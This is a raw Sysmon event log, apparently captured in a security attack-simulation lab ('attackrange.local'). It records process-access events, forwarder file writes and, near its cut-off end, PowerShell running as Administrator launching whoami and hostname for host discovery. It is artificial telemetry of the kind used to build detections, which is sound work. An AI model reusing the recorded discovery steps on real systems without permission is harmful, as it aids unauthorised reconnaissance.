21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917065Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917064Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917063Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917062Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.480{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8E2-6058-B102-00000000AE01}4244C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x8000000000000000638419Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:13.538{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57247-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000638421Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:19.773{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2D737BC3E772252D7D50B6D5984E03B5,SHA256=83B90FB972E963061DC7E4274E02B0240E1E37D77305842FB70BBAEB9AB6F6D1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917105Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:19.720{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917104Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:19.720{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917103Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:19.323{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88CDCF2276E9608FD9CD5E42285C5D2B,SHA256=59577218AFBE01DB6B44762EC013273AF1E0171D576AB3DF3CC1FE73408E378B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917109Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:20.720{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917108Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:20.720{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917107Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:20.689{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7FF262443FF08B65DA28A4D0E1FD30CF,SHA256=16EB343CAA33538543122CED57D2E5C9BDBE6607A34C698D0D6FA5D78F4EF21A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917106Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:20.356{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F82A43A5C65EEA591A4D9D4A7C0E4657,SHA256=7D8E1EB2EE9743A8463075E363E96175F5DF4EC0C52A8F62F10A496E56A1C690,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638422Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:20.789{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=807FDAB4709610D547B0A0CCAEB47BF9,SHA256=F2171C9BDB32FFBCBC19E361C9E570B2E2347913BD8113D13F3BC5A924527343,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638423Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:21.804{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2550B53D54B6BAF89C665C9DF6308E2A,SHA256=48FC28398CDC906BA87345A50394825BABF84CF2B80161CE138BA5408D54F68E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917129Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.941{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E1-605B-6869-00000000AE01}7772C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917128Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.940{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917127Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.940{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917126Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.939{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917125Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.939{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917124Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.939{896A638B-B8DD-6058-9202-00000000AE01}36325864C:\Windows\system32\csrss.exe{896A638B-B3E1-605B-6869-00000000AE01}7772C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917123Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.939{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E1-605B-6869-00000000AE01}7772C:\Windows\system32\whoami.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aff30069(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3d3b11(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b5b20(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b59b1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3a66d1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b3c13(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b3785(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b312d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+afe7b42b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af37009f(wow64) 154100x80000000000000005917122Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.930{896A638B-B3E1-605B-6869-00000000AE01}7772C:\Windows\System32\whoami.exe10.0.14393.0 (rs1_release.160715-1616)whoami - displays logged on user informationMicrosoft® Windows® Operating SystemMicrosoft Corporationwhoami.exe"C:\Windows\system32\whoami.exe"C:\Users\Administrator\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x80000000000000005917121Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.919{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E1-605B-6769-00000000AE01}2576C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917120Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.917{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917119Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.917{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917118Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.917{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917117Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.917{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917116Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.916{896A638B-B8DD-6058-9202-00000000AE01}36325864C:\Windows\system32\csrss.exe{896A638B-B3E1-605B-6769-00000000AE01}2576C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000005917115Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:21.916{896A638B-FBAD-6058-BE11-00000000AE01}4492212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{896A638B-B3E1-605B-6769-00000000AE01}2576C:\Windows\system32\HOSTNAME.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+aff30069(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+af3b34f2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.